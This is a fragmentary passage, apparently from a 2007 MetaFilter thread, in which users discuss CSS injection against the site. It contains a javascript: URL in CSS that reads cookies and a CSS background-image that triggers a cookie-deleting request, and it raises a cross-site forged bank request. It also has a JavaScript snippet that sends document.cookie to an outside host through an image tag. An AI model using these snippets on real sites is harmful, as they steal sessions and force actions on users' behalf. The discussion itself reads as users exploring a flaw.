SubscribeAdvertise here: Contact FM.
background: url(javascript:alert(document.cookie))" line in your css.Warning: Expected end of value for property but found ')'. Error in parsing value for property 'background'. Declaration dropped.
Source File: http://vallejo.cryptonym.net/~s1b7/doit.css
Line: 2
body {
background-image: url("http://www.metafilter.com/index.cfm?delcookie=yes");
}
mybank.com/dosomethingbad.cfm?confirmed=true, then you'd have to block "url(···)" from the CSS as well.var data = document.cookie;
var img = document.createElement('img');
img.setAttribute("src",'http://mysite.com/page/'+data);
document.body.appendChild(img);
Now to write some arcane CSS3 that no browser can read.
posted by dw at 9:50 PM on April 14, 2007